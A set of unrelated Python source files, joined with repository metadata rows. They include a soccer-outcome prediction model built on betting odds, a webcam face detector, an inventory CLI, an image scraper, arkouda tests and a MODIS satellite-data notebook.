#-----------------------------------------------------------------------------------------------------------------------
#---------------------- Aggregates bet sites odds data for all matches and sites ---------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def get_bets_odds_data(matches, bet_sites_selected, horizontal=True):
    """Aggregate bet-site odds data for all matches and selected sites.

    Parameters
    ----------
    matches : DataFrame with per-site odds columns (e.g. B365H/B365D/B365A).
    bet_sites_selected : iterable of bookkeeper column prefixes to extract.
    horizontal : if True, convert the odds to probabilities and place each
        bookkeeper's Win/Draw/Defeat columns side by side (plus match_api_id);
        if False, stack the raw odds of all bookkeepers vertically.

    Returns
    -------
    DataFrame with the aggregated odds/probability data.
    """
    odds_data = pd.DataFrame()
    # Loop through bet sites
    for bet_site_odd in bet_sites_selected:
        # Copy the site's odds columns so the renames/assignments below do
        # not write into a view of `matches` (SettingWithCopy).
        temp_data = matches.loc[:, matches.columns.str.contains(bet_site_odd)].copy()
        temp_data.loc[:, 'site_odd'] = str(bet_site_odd)
        temp_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
        # First three selected columns are the home/draw/away odds:
        # rename them and convert to numeric.
        cols = list(temp_data.columns)
        cols[:3] = ['Win', 'Draw', 'Defeat']
        temp_data.columns = cols
        for outcome in ('Win', 'Draw', 'Defeat'):
            temp_data[outcome] = pd.to_numeric(temp_data[outcome])
        if horizontal:
            # Convert odds to probabilities and prefix the columns with the
            # bookkeeper name so sites can sit side by side.
            temp_data = convert_odds_to_prob(temp_data)
            temp_data.drop(['match_api_id', 'site_odd'], axis=1, inplace=True)
            temp_data.columns = [bet_site_odd + "_" + col for col in temp_data.columns]
            odds_data = pd.concat([odds_data, temp_data], axis=1)
        else:
            # DataFrame.append was removed in pandas 2.0; concat replaces it.
            odds_data = pd.concat([odds_data, temp_data], ignore_index=True)
    if horizontal:
        # Bug fix: attach the id to the aggregated frame -- the original
        # assigned it to the last bookkeeper's temporary frame, which was
        # discarded.
        odds_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
    # Return site_odds data
    return odds_data
#-----------------------------------------------------------------------------------------------------------------------
#--------------------------------Create and aggregate features and labels for all matches-------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def create_features(matches, matches_players_data, bet_sites_selected_cols, get_overall=False, horizontal=True, x=10, verbose=True):
    """Create and aggregate features and labels for all matches.

    Parameters
    ----------
    matches : matches DataFrame to featurise.
    matches_players_data : per-match player data used for skill features.
    bet_sites_selected_cols : bookkeeper column prefixes (e.g. ['B365']).
    get_overall : forwarded to get_overall_ranking_skills.
    horizontal : forwarded to get_bets_odds_data (was hard-coded to True).
    x : recent-form window, forwarded to get_match_features (was hard-coded to 10).
    verbose : print progress and timing information.

    Returns
    -------
    DataFrame merging match features, player skills, betting odds and
    labels on match_api_id, with rows containing missing values dropped.
    """
    # Get players skills for features
    players_skills = get_overall_ranking_skills(matches_players_data, get_overall)
    if verbose:
        print("Generating match features...")
    start = time()
    # `row` avoids shadowing the window-size parameter `x`; both previously
    # hard-coded arguments (x, horizontal below) are now forwarded.
    match_stats = matches.apply(lambda row: get_match_features(row, matches, x=x), axis=1)
    match_stats.drop(['league_id'], inplace=True, axis=1)
    end = time()
    if verbose:
        print("Match features generated in {:.1f} minutes".format((end - start) / 60))
    if verbose:
        print("Generating match labels...")
    start = time()
    # Create match labels (axis=1 applies the function to each row)
    labels = matches.apply(get_match_label_result, axis=1)
    end = time()
    if verbose:
        print("Match labels generated in {:.1f} minutes".format((end - start) / 60))
    if verbose:
        print("Generating bet sites odds data...")
    start = time()
    # Get bet odds for all matches (horizontal forwarded, not hard-coded)
    bets_odds_data = get_bets_odds_data(matches, bet_sites_selected_cols, horizontal=horizontal)
    bets_odds_data.loc[:, 'match_api_id'] = matches.loc[:, 'match_api_id']
    end = time()
    if verbose:
        print("bet sites odds data generated in {:.1f} minutes".format((end - start) / 60))
    # Merge features and labels into one frame
    features = pd.merge(match_stats, players_skills, on='match_api_id', how='left')
    features = pd.merge(features, bets_odds_data, on='match_api_id', how='left')
    last_features = pd.merge(features, labels, on='match_api_id', how='left')
    # fill_nan_values(last_features) - deliberately not used; rows with NaNs
    # are dropped instead.
    last_features.dropna(inplace=True)
    # Return preprocessed data
    return last_features
# fill missing values of bet sites odds with average
def fill_nan_values(features):
    """Replace missing bet-site odds with the respective column mean.

    Covers the Win/Draw/Defeat columns of the four bookkeepers
    (B365, BW, IW, LB).  Mutates and returns *features*.
    """
    # One loop replaces the twelve copy-pasted fillna lines.
    for site in ("B365", "BW", "IW", "LB"):
        for outcome in ("Win", "Draw", "Defeat"):
            col = "{}_{}".format(site, outcome)
            features[col] = features[col].fillna(value=features[col].mean())
    return features
#-----------------------------------------------------------------------------------------------------------------------
#------------------------------------------------- Plot confusion Matrix------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def plot_confusion_matrix(cm, classes,
                          normalize=False,
                          title='Confusion matrix',
                          cmap=plt.cm.Blues):
    """
    Print and plot the confusion matrix *cm* with class tick labels.
    Normalization (per true-class row) can be applied by setting
    `normalize=True`.
    """
    if normalize:
        cm = cm.astype('float') / cm.sum(axis=1)[:, np.newaxis]
        print("Normalized confusion matrix")
    else:
        print('Confusion matrix, without normalization')
    print(cm)
    plt.imshow(cm, interpolation='nearest', cmap=cmap)
    plt.title(title)
    plt.colorbar()
    positions = np.arange(len(classes))
    plt.xticks(positions, classes, rotation=45)
    plt.yticks(positions, classes)
    # Counts print as integers, normalised values as two decimals.
    cell_format = '.2f' if normalize else 'd'
    cutoff = cm.max() / 2.
    for row in range(cm.shape[0]):
        for col in range(cm.shape[1]):
            # White text on dark cells, black on light ones.
            plt.text(col, row, format(cm[row, col], cell_format),
                     horizontalalignment="center",
                     color="white" if cm[row, col] > cutoff else "black")
    plt.ylabel('True label')
    plt.xlabel('Predicted label')
    plt.tight_layout()
    plt.show()
#-----------------------------------------------------------------------------------------------------------------------
#----------------------------------------- Create featuers for train/test datasets--------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
def start_create_features():
    """Build the train/test feature CSVs from the SQLite soccer database.

    Train features cover seasons 2008/2009-2014/2015 and are written to
    train_data.csv; test features cover season 2015/2016 and go to
    test_data.csv.
    """
    # Connecting to database.  os.path.join fixes the former
    # `path + 'database.sqlite'` concatenation, which produced the invalid
    # path 'D:\datasetdatabase.sqlite' (missing separator).
    path = r"D:\dataset"  # Insert path here
    database = os.path.join(path, 'database.sqlite')
    connection = sqlite3.connect(database)
    # Extract required data to tables - SQL
    # players football skills data
    player_skills_data = pd.read_sql("SELECT * FROM Player_Attributes;", connection)
    # matches train data - seasons: 2008/2009-2014/2015:
    matches_data = pd.read_sql("SELECT * FROM Match where season is not '2015/2016' ;", connection)
    # Columns that must all be present for a match to be usable.
    data_columns = ["country_id", "league_id", "season", "stage", "date", "match_api_id", "home_team_api_id",
                    "away_team_api_id", "home_team_goal", "away_team_goal", "home_player_1", "home_player_2",
                    "home_player_3", "home_player_4", "home_player_5", "home_player_6", "home_player_7",
                    "home_player_8", "home_player_9", "home_player_10", "home_player_11", "away_player_1",
                    "away_player_2", "away_player_3", "away_player_4", "away_player_5", "away_player_6",
                    "away_player_7", "away_player_8", "away_player_9", "away_player_10", "away_player_11"]
    matches_data.dropna(subset=data_columns, inplace=True)
    # To each match, attach the skill data of the players that took part.
    matches_players_train_data = get_football_matches_data(matches_data, player_skills_data)
    # Creating features and labels based on players skills, bet odds and
    # data of recent past games.
    bet_sites_selected_cols = ['B365', 'BW', 'IW', 'LB']
    # prepare train dataset features
    train_features = create_features(matches_data, matches_players_train_data, bet_sites_selected_cols, get_overall=True)
    train_features.to_csv('train_data.csv', index=False, header=True)
    # prepare test dataset features - season 2015/2016
    test_matches_data = pd.read_sql("SELECT * FROM Match where season is '2015/2016' ;", connection)
    test_matches_data.dropna(subset=data_columns, inplace=True)
    matches_players_test_data = get_football_matches_data(test_matches_data, player_skills_data)
    test_features = create_features(test_matches_data, matches_players_test_data, bet_sites_selected_cols, get_overall=True)
    test_features.to_csv('test_data.csv', index=False, header=True)
#-----------------------------------------------------------------------------------------------------------------------
#------------------------------------------------------- Start----------------------------------------------------------
#-----------------------------------------------------------------------------------------------------------------------
# Build the cached feature CSVs only when neither file exists yet.
if not (os.path.exists('train_data.csv') or os.path.exists('test_data.csv')):
    start_create_features()
train_features = pd.read_csv('train_data.csv')
test_features = pd.read_csv('test_data.csv')
# Split the target column off from each feature set.
labels_train_result = train_features['label']
train_features = train_features.drop('label', axis=1)
labels_test_result = test_features['label']
test_features = test_features.drop('label', axis=1)
#---------------------------------------------------------------------------------------------------------------------
#----------------------------------------------- Train models and show results----------------------------------------
#---------------------------------------------------------------------------------------------------------------------
print ("Models training details:")
k_fold = KFold(n_splits=10, shuffle=True, random_state=0)
# (display name, estimator) pairs, in the original evaluation order.
# One loop replaces the six copy-pasted evaluation/selection blocks; the
# original variable names are re-created below so the plotting and
# testing code that follows keeps working unchanged.
model_candidates = [
    ("Logistic Regression", LogisticRegression()),
    ("Knn", KNeighborsClassifier(n_neighbors=30)),
    ("Decision Tree", DecisionTreeClassifier()),
    ("Naive Bayes", GaussianNB()),
    ("SVM", SVC(kernel='rbf', C=0.8, gamma=0.4)),
    ("Random Forest", RandomForestClassifier(n_estimators=25, min_samples_split=25, max_depth=10, max_features='auto')),
]
average_scores = []
for model_name, clf in model_candidates:
    print("{} model:".format(model_name))
    score = cross_val_score(clf, train_features, labels_train_result, cv=k_fold, n_jobs=1, scoring='accuracy')
    average = round(np.mean(score) * 100, 2)
    print("The average score is:", average)
    average_scores.append(average)
# Unpack the per-model averages for the plotting code below.
(average_score_lgr, average_score_knn, average_score_dt,
 average_score_nb, average_score_svm, average_score_rf) = average_scores
# The first model with the highest score wins ties, matching the original
# strict '>' comparison chain.
best_index = average_scores.index(max(average_scores))
best_score = average_scores[best_index]
(LGR_chosen, KNN_chosen, DT_chosen, NB_chosen,
 SVM_chosen, RF_chosen) = [i == best_index for i in range(len(average_scores))]
#---------------------------------------------------------------------------------------------------------------------
#----------------------------------------------- plot bar chart of train results--------------------------------------
#---------------------------------------------------------------------------------------------------------------------
labels_classes = ['Defeat', 'Draw', 'Win']
# Shared model names and scores for both charts ("Logisic" typo fixed in
# the user-facing labels; the duplicated name/score lists are merged).
model_names = ['Logistic Regression', 'KNN', 'Decision Tree', 'Naive Bayes', 'SVM', 'Random Forest']
model_scores = [average_score_lgr, average_score_knn, average_score_dt, average_score_nb, average_score_svm, average_score_rf]
# Plot 1: horizontal bar chart with the score printed beside each bar.
fig, ax = plt.subplots()
width = 0.5  # the width of the bars
ind = np.arange(len(model_scores))  # the y locations for the groups
ax.barh(ind, model_scores, width, color="blue")
ax.set_yticks(ind + width / 2)
ax.set_yticklabels(model_names, minor=False)
plt.title('Models training results:')
plt.xlabel('Accuracy')
plt.ylabel('Models')
for i, v in enumerate(model_scores):
    ax.text(v + 0.2, i, str(v), color='blue', fontweight='bold')
plt.show()
# Plot 2: vertical bar chart of the same scores.
y_pos = np.arange(len(model_names))
plt.bar(y_pos, model_scores, align='center', alpha=0.2)
plt.xticks(y_pos, model_names)
plt.ylabel('Accuracy')
plt.title('Models training results:')
plt.show()
#---------------------------------------------------------------------------------------------------------------------
#--------------------------------------------- Test and envaluate the best model--------------------------------------
#---------------------------------------------------------------------------------------------------------------------
# Evaluate whichever model won cross-validation on the held-out test set.
# One loop over (chosen-flag, display name, estimator) replaces the six
# copy-pasted if-blocks; the "Logisic" typo in the printed name is fixed.
test_candidates = [
    (LGR_chosen, "Logistic Regression", LogisticRegression()),
    (KNN_chosen, "KNN", KNeighborsClassifier(n_neighbors=30)),
    (DT_chosen, "Decision Tree", DecisionTreeClassifier()),
    (NB_chosen, "Naive Bayes", GaussianNB()),
    # NOTE(review): the test-time SVM hyperparameters (C=0.24, gamma=0.15)
    # differ from the training ones (C=0.8, gamma=0.4) -- kept as-is,
    # confirm whether this mismatch is intentional.
    (SVM_chosen, "SVM", SVC(kernel='rbf', C=0.24, gamma=0.15)),
    (RF_chosen, "Random Forest", RandomForestClassifier(n_estimators=25, min_samples_split=25, max_depth=10, max_features='auto')),
]
for chosen, model_name, model_chosen in test_candidates:
    if not chosen:
        continue
    print("The chosen model to test is {}:".format(model_name))
    model_chosen.fit(train_features, labels_train_result)
    predictions = model_chosen.predict(test_features)
    print('Accuracy:', metrics.accuracy_score(labels_test_result, predictions))
    print('Classification Report:')
    print(classification_report(labels_test_result, predictions))
    print('Confusion Matrix:')
    cnf_matrix = confusion_matrix(labels_test_result, predictions)
    np.set_printoptions(precision=2)
    # Plot non-normalized confusion matrix
    plt.figure()
    plot_confusion_matrix(cnf_matrix, classes=labels_classes,
                          title='Confusion matrix, without normalization')
| ShayEK34/SoccerProject-DataAnalysis-Python | MLmodel.py | MLmodel.py | py | 33,581 | python | en | code | 0 | github-code | 13 |
9436842940 | # coding=utf-8
import cv2
import dlib
detector = dlib.get_frontal_face_detector()
win = dlib.image_window()
# cap = cv2.VideoCapture('E:\Python\PycharmProjects\ImgHash\Opencv\\1.mp4')
cap = cv2.VideoCapture(0)
while cap.isOpened():
ret, cv_img = cap.read()
# OpenCV默认RGB图像,dlib BGR图像
img = cv2.cvtColor(cv_img, cv2.COLOR_RGB2BGR)
dets = detector(img, 0)
# print("Number of faces detected: {}".format(len(dets)))
# for i, d in enumerate(dets):
# print("Detection {}: Left: {} Top: {} Right: {} Bottom: {}".format(
# i, d.left(), d.top(), d.right(), d.bottom()))
win.clear_overlay()
win.set_image(img)
win.add_overlay(dets)
cap.release() | swiich/face_recognize | recVideo.py | recVideo.py | py | 713 | python | en | code | 0 | github-code | 13 |
4210600650 | from typing import Optional
class ListNode:
def __init__(self, val=0, next=None):
self.val = val
self.next = next
class Solution:
def odd_even_list(self, head: Optional[ListNode]) -> Optional[ListNode]:
if not head:
return None
odd = head
even = head.next
even_head = even
while even and even.next:
odd.next = even.next
odd = odd.next
even.next = odd.next
even = even.next
odd.next = even_head
return head
if __name__ == "__main__":
one = ListNode(1)
two = ListNode(2)
three = ListNode(3)
four = ListNode(4)
five = ListNode(5)
one.next = two
two.next = three
three.next = four
four.next = five
five.next = None
out = Solution().odd_even_list(one)
while out:
print(out.val)
out = out.next
| mhasan09/leetCode_M | odd_even_linkedlist.py | odd_even_linkedlist.py | py | 906 | python | en | code | 0 | github-code | 13 |
32045601690 | import numpy as np
import pytest
import arkouda as ak
def gather_scatter(a):
rev = ak.array(np.arange(len(a) - 1, -1, -1))
a2 = a[rev]
res = ak.zeros(len(a), dtype=a.dtype)
res[:] = a2
res[rev] = a2
return res
class TestBigInt:
@pytest.mark.parametrize("size", pytest.prob_size)
def test_negative(self, size):
# test with negative bigint values
arr = -1 * ak.randint(0, 2**32, size)
bi_neg = ak.cast(arr, ak.bigint)
res = gather_scatter(bi_neg)
assert bi_neg.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_large(self, size):
# test with 256 bit bigint values
top_bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
mid_bits1 = ak.randint(0, 2**32, size, dtype=ak.uint64)
mid_bits2 = ak.randint(0, 2**32, size, dtype=ak.uint64)
bot_bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([top_bits, mid_bits1, mid_bits2, bot_bits])
res = gather_scatter(bi_arr)
assert bi_arr.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_zero(self, size):
# test all zero bigint assignments
all_zero = ak.zeros(size, dtype=ak.bigint)
res = gather_scatter(all_zero)
assert all_zero.to_list() == res.to_list()
def test_variable_sized(self):
# 5 bigints of differing number of limbs
bits1 = ak.array([0, 0, 0, 0, 1], dtype=ak.uint64)
bits2 = ak.array([0, 0, 0, 1, 1], dtype=ak.uint64)
bits3 = ak.array([0, 0, 1, 1, 1], dtype=ak.uint64)
bits4 = ak.array([0, 1, 1, 1, 1], dtype=ak.uint64)
bits5 = ak.array([1, 1, 1, 1, 1], dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([bits1, bits2, bits3, bits4, bits5])
res = gather_scatter(bi_arr)
assert bi_arr.to_list() == res.to_list()
@pytest.mark.parametrize("size", pytest.prob_size)
def test_change_size(self, size):
# Go from 256 bigint values down to just 1
bits = ak.randint(0, 2**32, size, dtype=ak.uint64)
bi_arr = ak.bigint_from_uint_arrays([bits, bits, bits, bits])
res = ak.ones_like(bi_arr)
bi_arr[:] = res
assert bi_arr.to_list() == res.to_list()
| Bears-R-Us/arkouda | PROTO_tests/tests/bigint_agg_test.py | bigint_agg_test.py | py | 2,321 | python | en | code | 211 | github-code | 13 |
25556877755 | """
Usage:
inventory add <name> <description> <price> <date_added> <item_id>
inventory remove <item_name>
inventory list
inventory check_out <item_id>
inventory check_in <item_id>
inventory item_view <item_id>
inventory search_inventory <item_name>
inventory assetvalue
inventory list_export <filename>
inventory export
inventory
inventory (-i | --interactive)
inventory (-h | --help)
Options:
-i, --interactive Interactive Mode
-h, --help Show this screen and exit.
"""
from docopt import docopt, DocoptExit
import cmd
import os
import sys
from pyfiglet import Figlet
from colorama import Fore, Back, Style, init
from inventory_management import Inventory
inventory = Inventory()
def docopt_cmd(func):
"""
This decorator is used to simplify the try/except block and pass the result
of the docopt parsing to the called action
"""
def fn(self, arg):
try:
opt = docopt(fn.__doc__, arg)
except DocoptExit as e:
# The DocoptExit is thrown when the args do not match
# We print a message to the user and the usage block
print('Invalid Command!')
print(e)
return
except SystemExit:
# The SystemExit exception prints the usage for --help
# We do not need to do the print here
return
return func(self, opt)
fn.__name__ = func.__name__
fn.__doc__ = func.__doc__
fn.__dict__.update(func.__dict__)
return fn
def intro():
print(__doc__)
class InventoryCLI(cmd.Cmd):
os.system("cls")
init()
font = Figlet(font = 'rev')
print (Fore.YELLOW + font.renderText('Inventory Manager'))
prompt = 'InventoryCLI >>> '
@docopt_cmd
def do_add(self, arg):
"""Usage: add <name> <description> <price> <date_added> <item_id>"""
name = arg["<name>"]
description = arg["<description>"]
price = arg["<price>"]
date_added = arg["<date_added>"]
item_id = arg["<item_id>"]
inventory.add_item(name, description, price, date_added, item_id)
@docopt_cmd
def do_remove(self, arg):
"""Usage: remove <item_id>"""
id = arg["<item_id>"]
inventory.remove_item(id)
@docopt_cmd
def do_list(self, arg):
"""Usage: list [--export]"""
inventory.list_all_remaining_stock()
@docopt_cmd
def do_item_view(self, arg):
"""Usage: item_view <item_id>"""
id_to_search_for = arg["<item_id>"]
inventory.item_view_id(id_to_search_for)
@docopt_cmd
def do_assetvalue(self, arg):
"""Usage: assetvalue"""
inventory.asset_value_of_inventory()
@docopt_cmd
def do_check_in(self, arg):
"""Usage: checkin <item_id>"""
check_in_item_id = arg["<item_id>"]
inventory.check_in_item(check_in_item_id)
@docopt_cmd
def do_check_out(self, arg):
"""Usage: checkout <item_id>"""
check_out_item_id = arg["<item_id>"]
inventory.check_out(check_out_item_id)
@docopt_cmd
def do_list_export(self, arg):
"""Usage: list_export <filename>"""
filename = arg["<filename>"]
inventory.list_export(filename)
@docopt_cmd
def do_search_inventory(self, arg):
"""Usage: search <item_name>"""
item_to_search = arg["<item_name>"]
inventory.search(item_to_search)
def do_quit(self, arg):
"""Usage: quit"""
os.system('clear')
print ('Application Exiting')
exit()
opt = docopt(__doc__,sys.argv[1:])
if opt["--interactive"]:
InventoryCLI().cmdloop()
print(opt)
| davidmukiibi/NewInventoryManagement | app.py | app.py | py | 3,710 | python | en | code | 0 | github-code | 13 |
39154370351 | import requests
from bs4 import BeautifulSoup
from urllib.request import urlopen as uReq
import os
save_dir='images/'
if not os.path.exists(save_dir):
os.mkdir(save_dir)
query=input('enter object name to scrap')
response=requests.get(f'https://www.google.com/search?q={query}&sca_esv=579625040&tbm=isch&source=hp&biw=1024&bih=588&ei=bKxHZcapO6bn2roPzvutyAc&iflsig=AO6bgOgAAAAAZUe6fQtT2TjyoqHotHqea5OPpeo7kChZ&ved=0ahUKEwjGj4e2jq2CAxWms1YBHc59C3kQ4dUDCAY&uact=5&oq=elon+musk&gs_lp=EgNpbWciCWVsb24gbXVzazIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQMyCBAAGIAEGLEDMggQABiABBixAzIIEAAYgAQYsQNI5B9QkgtYtRtwAHgAkAEAmAHKAaABgg2qAQUwLjguMbgBA8gBAPgBAYoCC2d3cy13aXotaW1nqAIAwgIFEAAYgATCAggQABixAxiDAcICCxAAGIAEGLEDGIMBwgIEEAAYAw&sclient=img')
soup=BeautifulSoup(response.content,'html.parser')
image_tags=soup.find_all('img')
del image_tags[0]
for i in image_tags:
image_url=i['src']
image_data=requests.get(image_url).content
with open(os.path.join(save_dir,f'{query}_{image_tags.index(i)}.jpg'),'wb') as f:
f.write(image_data)
| Chatserohan/image-scrapper | scrapper.py | scrapper.py | py | 1,107 | python | en | code | 0 | github-code | 13 |
70852492178 | from aocd import data, submit
firstPolicyCount = 0
secondPolicyCount = 0
for line in data.splitlines():
policy, pwd = line.split(":")
pwd = pwd.strip()
limits, letter = policy.split(" ")
lower, upper = limits.split("-")
lower = int(lower)
upper = int(upper)
occurences = pwd.count(letter)
if lower <= occurences and occurences <= upper:
firstPolicyCount += 1
first = pwd[lower - 1]
second = pwd[upper - 1]
if first != second and (first == letter or second == letter):
secondPolicyCount += 1
submit(firstPolicyCount, part='a')
submit(secondPolicyCount, part='b')
| charvey/advent-of-code | 2020/02.py | 02.py | py | 627 | python | en | code | 0 | github-code | 13 |
18712304463 | # 单调栈
def dailyTemperatures(T: [int]) -> [int]:
n = len(T)
result = [0] * n
stack = []
for i in range(n):
while stack and T[stack[-1]] < T[i]:
tmp = stack.pop()
result[tmp] = i - tmp
stack.append(i)
return result
if __name__ == "__main__":
T = [73, 74, 75, 71, 69, 72, 76, 73]
result = dailyTemperatures(T)
print(result)
| russellgao/algorithm | dailyQuestion/2020/2020-06/06-11/python/solution_stack.py | solution_stack.py | py | 401 | python | en | code | 3 | github-code | 13 |
12181323596 | import numpy as np
def polygonValuesByID(ds, ids):
    """Map every polygon id occurring in `ids` (NaN entries ignored) to the
    first value of `ds` falling inside that polygon."""
    valid_ids = np.unique(ids[~np.isnan(ids)])
    # One representative value per polygon: the first cell whose id matches.
    return {polid: ds[ids == polid][0] for polid in valid_ids}
def statsByID(ds, ids, stat='sum'):
    """Aggregate `ds` per polygon id found in `ids` (NaN ids ignored).

    Parameters
    ----------
    ds : array of values to aggregate
    ids : array of polygon ids, same shape as `ds`
    stat : aggregation name; only 'sum' is implemented

    Returns
    -------
    dict mapping polygon id -> NaN-ignoring sum of the matching `ds` cells.
    Unknown `stat` values only print a warning (as before) and produce no
    entries.
    """
    # The original called np.unique(np.unique(...), return_counts=True); the
    # inner unique() already de-duplicates, so every count was 1 and the
    # counts were never used.  A single unique() yields the same keys in the
    # same (sorted) order.
    uniqueids = np.unique(ids[~np.isnan(ids)])
    stats = {}
    for polid in uniqueids:
        if stat == 'sum':
            stats[polid] = np.nansum(ds[ids == polid])
        else:
            print('Invalid statistic')
    return stats
def extenddataset(X, y, ylr=np.array(None), transf=None):
    """Optionally augment a sample batch with flipped/rotated copies.

    X is indexed as X[i, :, :, :], i.e. a 4-D batch with samples on axis 0
    -- presumably (N, H, W, C); TODO confirm with callers.  y (and the
    optional extra target ylr) are per-sample arrays aligned with X.

    With transf == '2T6' each sample is assigned one of six dihedral
    transforms, the transformed copies are appended to the originals, and
    the combined set is shuffled; any other transf returns the inputs
    unchanged.  The default ylr=np.array(None) is a 0-d object array whose
    .any() is False, used as a "no ylr supplied" sentinel; when ylr is
    given, a third aligned array is returned.

    NOTE(review): np.random.randint(0, 5, ...) draws values 0..4 only, so
    the `auxtransf == 5` selections below are always empty and the
    rot90(axes=(2,1)) transform is effectively dead code -- was
    randint(0, 6) intended?  Confirm before relying on all six transforms.
    """
    if transf == '2T6':
        # Random transform label per original sample (see NOTE above).
        auxtransf = np.random.randint(0, 5, X.shape[0])
        # Originals followed by each transform applied to its subset.
        newX = np.concatenate((X,
                               np.flip(X[auxtransf == 0, :, :, :], 1),
                               np.flip(X[auxtransf == 1, :, :, :], 2),
                               np.flip(X[auxtransf == 2, :, :, :], (1,2)),
                               np.transpose(X[auxtransf == 3, :, :, :], (0, 2, 1, 3)),
                               np.rot90(X[auxtransf == 4, :, :, :], axes=(1,2)),
                               np.rot90(X[auxtransf == 5, :, :, :], axes=(2,1))), axis=0)
        # Targets duplicated in the same subset order so rows stay aligned.
        newy = np.concatenate((y,
                               y[auxtransf == 0],
                               y[auxtransf == 1],
                               y[auxtransf == 2],
                               y[auxtransf == 3],
                               y[auxtransf == 4],
                               y[auxtransf == 5]))
        if ylr.any(): newylr = np.concatenate((ylr,
                                               ylr[auxtransf == 0],
                                               ylr[auxtransf == 1],
                                               ylr[auxtransf == 2],
                                               ylr[auxtransf == 3],
                                               ylr[auxtransf == 4],
                                               ylr[auxtransf == 5]))
        # auxtransfpos = np.random.choice(X.shape[0], round(X.shape[0]/2), replace=False)
        # auxtransfcat = np.random.randint(0, 5, round(X.shape[0]/2))
        # auxtransf = np.empty((X.shape[0]), dtype=int)
        # auxtransf[auxtransfpos] = auxtransfcat
        # newX = np.concatenate((newX,
        #                        np.flip(X[auxtransf == 0, :, :, :], 1),
        #                        np.flip(X[auxtransf == 1, :, :, :], 2),
        #                        np.flip(X[auxtransf == 2, :, :, :], (1,2)),
        #                        np.transpose(X[auxtransf == 4, :, :, :], (0, 2, 1, 3)),
        #                        np.rot90(X[auxtransf == 3, :, :, :], axes=(1,2)),
        #                        np.rot90(X[auxtransf == 5, :, :, :], axes=(2,1))), axis=0)
        # newy = np.concatenate((newy,
        #                        y[auxtransf == 0],
        #                        y[auxtransf == 1],
        #                        y[auxtransf == 2],
        #                        y[auxtransf == 3],
        #                        y[auxtransf == 4],
        #                        y[auxtransf == 5]))
        # if ylr.any(): newylr = np.concatenate((newylr,
        #                                        ylr[auxtransf == 0],
        #                                        ylr[auxtransf == 1],
        #                                        ylr[auxtransf == 2],
        #                                        ylr[auxtransf == 3],
        #                                        ylr[auxtransf == 4],
        #                                        ylr[auxtransf == 5]))
        # Shuffle the extended set with one shared permutation.
        sids = np.random.choice(newX.shape[0], newX.shape[0], replace=False)
        newX = newX[sids, :, :, :]
        newy = newy[sids]
        if ylr.any(): newylr = newylr[sids]
    else:
        newX = X
        newy = y
        newylr = ylr
    if ylr.any():
        return newX, newy, newylr
    else:
        return newX, newy
| mgeorgati/spDisag | SDis_Self-Training/utils/nputils.py | nputils.py | py | 4,032 | python | en | code | 2 | github-code | 13 |
19935635760 |
# coding: utf-8
# Download a Modis Aqua scene from http://modis.gsfc.nasa.gov/data/dataprod/
# In[32]:
from a212utils.download import download_file
from IPython.display import Image
import h5py
import pandas as pd
# Toggle: fetch the HDF5 scene over HTTP or reuse an existing local copy.
download = False
if download:
    #
    # satelite data for day 127 of 2014 Modis Aqua level 3 cloud data
    #
    url = 'http://clouds.eos.ubc.ca/~phil/Downloads/a212/fields.h5'
    local_file = download_file(url)
    print('downloaded {}'.format(local_file))
else:
    local_file='fields.h5'
# In[33]:
get_ipython().magic('matplotlib inline')
from pathlib import Path
import a212data
picwidth = 800
# Locate the packaged true-colour JPEG of this scene and display it inline.
datadir = a212data.__path__[0]
image_path = Path(datadir).joinpath('MYBRGB.A2014127.2110.005.2014128174940.jpg')
print(str(image_path))
Image(str(image_path),width=picwidth)
# Use [h5py](http://docs.h5py.org/en/latest/) to read the image data
# In[34]:
from a212utils.h5dump import dumph5
if download:
    dumph5(local_file)
# In[35]:
# Read the four channel datasets under /A2014127 plus every file attribute
# into a plain dict.  NOTE(review): `vars` shadows the built-in of the same
# name (harmless in a notebook, but worth renaming).
with h5py.File(local_file,'r') as f:
    file_dict = {}
    vars = ['ch29','ch31','cloud_mask','phase']
    for name in vars:
        fullname = '/A2014127/{}'.format(name)
        file_dict[name] = f[fullname][...]
    file_dict.update(f.attrs.items())
# In[36]:
file_dict.keys()
# In[37]:
#
# make a 5 color palette
#
import seaborn as sns
from matplotlib.colors import ListedColormap, LinearSegmentedColormap
colors = ["royal blue", "baby blue", "eggshell", "burnt red", "soft pink"]
print([the_color for the_color in colors])
# Translate the xkcd colour names into RGB triples for the colormap.
colors=[sns.xkcd_rgb[the_color] for the_color in colors]
pal=ListedColormap(colors,N=5)
# In[38]:
# #
# the A2014127.2110 scene is a descending orbit, so south is on top
# and west is on the right, need to rotate through 180 degrees
#
get_ipython().magic('matplotlib inline')
from matplotlib import pyplot as plt
fig,ax = plt.subplots(1,1,figsize = (10,10))
# NOTE(review): `np` is used without a visible `import numpy as np` in this
# file -- presumably imported in an earlier notebook session; confirm.
phase_rot=np.rot90(file_dict['phase'],2)
CS=ax.imshow(phase_rot,cmap=pal)
ax.set_title('ungridded phase map with 2 rotations')
cax=fig.colorbar(CS)
#
# we wrote the phase legend into the h5 attributes
# use it to label the color axis
#
labels=file_dict['phase_vals']
labels=labels.split(',')
# Five equal bins over 0..4; tick each bin centre with its phase label.
ends=np.linspace(0,4,6)
centers=(ends[1:] + ends[:-1])/2.
cax.set_ticks(centers)
cax.set_ticklabels(labels)
# In[91]:
plt.close('all')
fig,ax=plt.subplots(1,1)
ax.hist(phase_rot.ravel())
ax.set_title('Gridded: Mask - 0 = Cloud,1 = 66% prob.\n Clear,2 = 95% prob. Clear,3 = 99% prob. Clear')
a=dict(one=1,two=2)
print(a)
# NOTE(review): the next three statements are notebook scratch work and all
# fail at runtime (a dict has no .loc or .one, and make_tuple is undefined
# here); consider deleting them.
a.loc['one',5:7]
b=make_tuple(a)
a.one
# In[40]:
plt.close('all')
